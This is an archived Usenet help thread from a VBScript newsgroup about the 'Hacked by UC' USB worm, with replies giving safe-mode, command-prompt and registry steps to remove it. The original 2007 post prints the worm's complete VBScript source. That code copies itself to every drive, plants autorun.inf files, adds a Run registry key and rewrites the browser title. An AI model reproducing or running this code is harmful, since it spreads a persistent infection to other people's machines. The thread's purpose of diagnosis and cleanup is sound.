Prev: Force command to run for each computer in txt file list of compute
Next: Compare two text files and output third
From: Trevor Roodt on 7 Oct 2010 09:41 Hi all I hope someone can help me please. I am having a similar problem, however it states Hacked by ( my Computor name) in the IE title bar. I have gong through these steps and have not been able to find a solution to this. Many thanks Trevor > On Wednesday, March 21, 2007 4:01 AM SF wrote: > Hi, > > I recently visited an internet shop, I downloaded some files, plug my flash > drive in to copy those download files. At home, I plug the flash drive into > my PC and transfering the files. When I start my windows xp the next day, I > cannot double click on the C: drive, it did not work (did not open). I got a > brief display of the hour glass. When I open a web page, I saw on the top a > message displaying the "Hacked by UC". > > I found a script below that cause the above problem. Does this a sign of > hacking and how do I set it back to my previous windows setting? > > > 'My name is Slow but sure V0.05 > on error resume next > dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd > atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe uc.vbs" > set fs = createobject("Scripting.FileSystemObject") > set mf = fs.getfile(Wscript.ScriptFullname) > dim text,size > size = mf.size > check = mf.drive.drivetype > set text=mf.openastextstream(1,-2) > do while not text.atendofstream > mysource=mysource&text.readline > mysource=mysource & vbcrlf > loop > do > Set winpath = fs.getspecialfolder(0) > set tf = fs.getfile(winpath & "\uc.vbs") > tf.attributes = 32 > set tf=fs.createtextfile(winpath & "\uc.vbs",2,true) > tf.write mysource > tf.close > set tf = fs.getfile(winpath & "\uc.vbs") > tf.attributes = 39 > for each flashdrive in fs.drives > If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and > flashdrive.path <> "A:" then > set tf=fs.getfile(flashdrive.path &"\uc.vbs") > tf.attributes =32 > set tf=fs.createtextfile(flashdrive.path &"\uc.vbs",2,true) > tf.write mysource > tf.close > set tf=fs.getfile(flashdrive.path &"\uc.vbs") > tf.attributes =39 > set tf =fs.getfile(flashdrive.path &"\autorun.inf") > tf.attributes = 32 > set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) > tf.write atr > tf.close > set tf =fs.getfile(flashdrive.path &"\autorun.inf") > tf.attributes=39 > end if > next > set rg = createobject("WScript.Shell") > rg.regwrite > "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC",winpath&"\uc.vbs" > rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet > Explorer\Main\Window Title","Hacked by UC" > rg.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2" > if check <> 1 then > Wscript.sleep 200000 > end if > loop while check<>1 > set sd = createobject("Wscript.shell") > sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname >> On Wednesday, March 21, 2007 7:00 AM Paulaner wrote: >> The first thing I would do is go into regedit and delete this key: >> "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC" >> >> Then delete this one: >> "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window >> Title" >> >> Then delete uc.vbs from your windows folder and your flash drive. >> >> >> >> On Wed, 21 Mar 2007 16:01:20 +0700, "SF" <ss(a)yahoo.com> wrote: >> >> <snip> >>> On Friday, March 30, 2007 6:11 PM scott wrote: >>> it keeps copying itself. its also in your startup and your shell so upon double clicking C: it will copy itself once more. Ive tried deleting off flash drive, c drive, even using command prompts, ive tried deleting registry keys and restarting in command prompt..i will try to restart in safe mode now >>>> On Saturday, March 31, 2007 12:37 AM Done wrote: >>>> Boot in safe mode, Remove (from) C:\autorun.inf, delete Registry\Software\Windows\CurrentVersion\Run\uc key, delete HKEY_CURRENT_USER\Software\Microsoft\Internet >>>> >>>> Explorer\Main\Window Title key. Reboot. >>>>> On Saturday, March 31, 2007 2:24 PM Ai Chung Chong wrote: >>>>> To completely remove it from your computer, restart the computer to Safe Mode (do not try to access any drive using Windows Explorer before you complete following steps): >>>>> >>>>> >>>>> >>>>> - Go to Task Manager (Press Ctrl+Alt+del), make sure there are no process with Image Name = "wscript.exe". End the process if it is running. >>>>> >>>>> - Go to command prompt, type following command: >>>>> >>>>> del %systemroot%\uc.vbs >>>>> >>>>> For each of the drive available on the computer, type following command in command prompt (replace <drive_name> with the drive letter): >>>>> >>>>> attrib -h -s -r <drive_name>:\autorun.inf >>>>> >>>>> attrib -h -s -r <drive_name>:\uc.vbs >>>>> >>>>> del <drive_name>:\autorun.inf >>>>> >>>>> del <drive_name>:\uc.vbs >>>>> >>>>> - Remove following registry key: >>>>> >>>>> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC >>>>> >>>>> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title >>>>> >>>>> HKCR\vbsfile\DefaultIcon >>>>> >>>>> >>>>> >>>>> >>>>> >>>>> To save yourself from similar incident again, you might want to take note of following point: >>>>> >>>>> >>>>> >>>>> - try to use only account without admin privilege to logon to your computer and use runas to execute task that require administrator privilege) >>>>> >>>>> >>>>> >>>>> - disable autorun on your computer (this will resulted in audio/video will not automatically play when you insert a CD/DVD/removable drive ). You can refer to following article for how to disable autorun: http://www.annoyances.org/exec/show/article03-018. >>>>>> On Monday, April 02, 2007 2:02 PM julia wrote: >>>>>> i tried the abovementioned techniques for deleting this virus, and kept coming up with "file not found" when i typed commands into the command prompt. any suggestions? >>>>>>> On Monday, October 15, 2007 4:39 PM Paul Hatch wrote: >>>>>>> Hi Julia, >>>>>>> >>>>>>> I just wanted to let you know that I figured out a solution that worked for me; that is to get double-click access to my drives and get rid of 'Hacked by UC' in the IE title bar. Anyway, here are the steps I followed that got the problem fixed on my computer. However, these instructions are kind of long, so it might take awhile to get through all the steps. >>>>>>> >>>>>>> >>>>>>> >>>>>>> One last thing before I get into the instructions to fix the problem: You might want to save this page to your hard drive, to your My Documents folder. The reason I say this is that if you have the page saved to your hard drive you will be able to view it while you are in safe-mode. Also, if you have a word processing program, such as Microsoft Word, you can copy this post and paste it into a document(and save to the My Documents folder)and that should make it a bit easier to locate this post, than if you use your web browser and open the webpage, although you can do either. (Just anything to view these instructions in safe-mode - they're quite lengthy) Well, I hope my instructions help you get that nasty problem fixed - I wish you luck! >>>>>>> >>>>>>> --------------------------------------------------- >>>>>>> >>>>>>> >>>>>>> >>>>>>> If you see ?Hacked by UC? in the title bar of Internet Explorer, you may have noticed that you cannot open the drives in Windows Explorer by double-clicking on the drives. >>>>>>> >>>>>>> >>>>>>> >>>>>>> If you are experiencing this problem, and you need immediate access to a drive, you can safely open it by right-clicking on the drive you want to open, and then click Open. >>>>>>> >>>>>>> >>>>>>> >>>>>>> The reason I say ?safely? is that if you double-click a drive to open it, and it doesn?t open, it runs a script in the root of that drive called ?uc.vbs?, which is referenced in the autorun.inf file. >>>>>>> >>>>>>> >>>>>>> >>>>>>> Now, let?s proceed to fix the problem: >>>>>>> >>>>>>> (Note: Press Enter after each line, and do not type the punctuation) >>>>>>> >>>>>>> >>>>>>> >>>>>>> 1. Restart the computer and go into safe-mode. >>>>>>> >>>>>>> 2. Press Ctrl+Alt+Del to bring up the Windows Task Manager. >>>>>>> >>>>>>> 3. Click the Processes tab. Look for a process called wscript.exe, and terminate it if it?s running. There may be more than one instance of this process so be sure you terminate all of them if there?s more than one. >>>>>>> >>>>>>> 4. Now you need to show the hidden files and folders, if they?re not already shown. >>>>>>> >>>>>>> >>>>>>> >>>>>>> To do this follow these steps: >>>>>>> >>>>>>> ? Open My Computer >>>>>>> >>>>>>> ? Go Tools | Folder Options and click the View tab >>>>>>> >>>>>>> ? Click the radio button Show Hidden Files and Folders >>>>>>> >>>>>>> ? Scroll down if necessary and find the check box Hide Protected Operating System Files, and if you see a check mark remove it >>>>>>> >>>>>>> >>>>>>> >>>>>>> 5. Open the Command Prompt >>>>>>> >>>>>>> 6. Type ?del %systemroot%\uc.vbs?. Don?t worry if you get a ?File not found? error >>>>>>> >>>>>>> 7. Go to the root of the C drive and type ?attrib ?r ?h ?s C:\uc.vbs? >>>>>>> >>>>>>> 8. Type del uc.vbs. >>>>>>> >>>>>>> 9. Type attrib ?r ?h ?s C:\autorun.inf >>>>>>> >>>>>>> 10. Type del autorun.inf >>>>>>> >>>>>>> >>>>>>> >>>>>>> Repeat steps 6 through 9 for all hard drives or hard drive partitions that you?re having trouble with, and replace C with the appropriate drive letter, and remember to press Enter after every line. >>>>>>> >>>>>>> >>>>>>> >>>>>>> Now, Go to the Start menu, click Run, type ?regedit? and then click OK. >>>>>>> >>>>>>> >>>>>>> >>>>>>> This takes you into the Registry Editor. What you?re going to do here is remove the following values from the registry: >>>>>>> >>>>>>> >>>>>>> >>>>>>> >>>>>>> >>>>>>> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC >>>>>>> >>>>>>> >>>>>>> >>>>>>> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title >>>>>>> >>>>>>> HKCR\vbsfile\DefaultIcon >>>>>>> >>>>>>> >>>>>>> >>>>>>> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\UC >>>>>>> >>>>>>> >>>>>>> >>>>>>> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window >>>>>>> >>>>>>> Title >>>>>>> >>>>>>> >>>>>>> >>>>>>> When you?re finished deleting the above registry values navigate to the top of the registry, and then go Edit | Find, and then type ?uc.vbs?. When you?re finished click Find Now. >>>>>>> >>>>>>> >>>>>>> >>>>>>> Furthermore, don?t delete the string value itself ? Here?s what I recommend: open the string value(which is in the right pane) and then delete everything in it, and then click OK. Press F3 when you?re ready to go to the next occurrence. >>>>>>> >>>>>>> >>>>>>> >>>>>>> Keep doing this until you have emptied all the string values containing references to ?uc.vbs?. When you have finished going through the whole registry, you?ll want to be sure you haven?t missed any occurrences. >>>>>>> >>>>>>> >>>>>>> >>>>>>> Navigate back to the top of the registry and click on My Computer to highlight it. You want to be sure you?re searching the whole registry. >>>>>>> >>>>>>> >>>>>>> >>>>>>> Now Go to the edit menu and click Find. In the text box make sure you see uc.vbs, and then click Find Next. What we?re doing is a sweep of the entire registry to make sure we have deleted every reference to uc.vbs. I?m not certain that it?s safe to delete the string value itself because I haven?t tested it, so we?re staying on the safe side. >>>>>>> >>>>>>> >>>>>>> >>>>>>> If you come across any string value with this filename, open it, delete the contents of the string value. You can do this quickly by placing the insertion point at the beginning of the text field and then pressing Shift+End. This selects everything in the string value. Press Delete, then click OK. After you have done this press F3 to see if there are any more of these references. >>>>>>> >>>>>>> >>>>>>> >>>>>>> After you have come to the end of the registry, navigate back to the top of the registry and then do another search. What you?re after is to go through the whole registry without finding any occurrences of uc.vbs. >>>>>>> >>>>>>> >>>>>>> >>>>>>> When you?re finished, restart the computer. >>>>>>> >>>>>>> >>>>>>> >>>>>>> After you?ve restarted the computer open Windows Explorer (My Computer) and then double-click on the icon for your hard drive. You should now be in your hard drive?s directory. >>>>>>> >>>>>>> >>>>>>> >>>>>>> Well, you?re all finished! That was quite a journey, but if you did everything correctly I believe that you will again have double-click access to your drives as well as be rid of ?Hacked by UC? in the IE title bar. >>>>>>> Submitted via EggHeadCafe - Software Developer Portal of Choice >>>>>>> Mocking WCF Services Using Moq >>>>>>> http://www.eggheadcafe.com/tutorials/aspnet/b76105f1-f832-4b52-82ba-d5a61d435d81/mocking-wcf-services-using-moq.aspx
From: Mayayana on 7 Oct 2010 17:49
You're replying to a post from 3 years ago! You really ought to get a decent newsreader rather than using online copies of Usenet. This is a group for VBScript programming. What you really want is a "users" group, or maybe try the forum at annoyances.org. |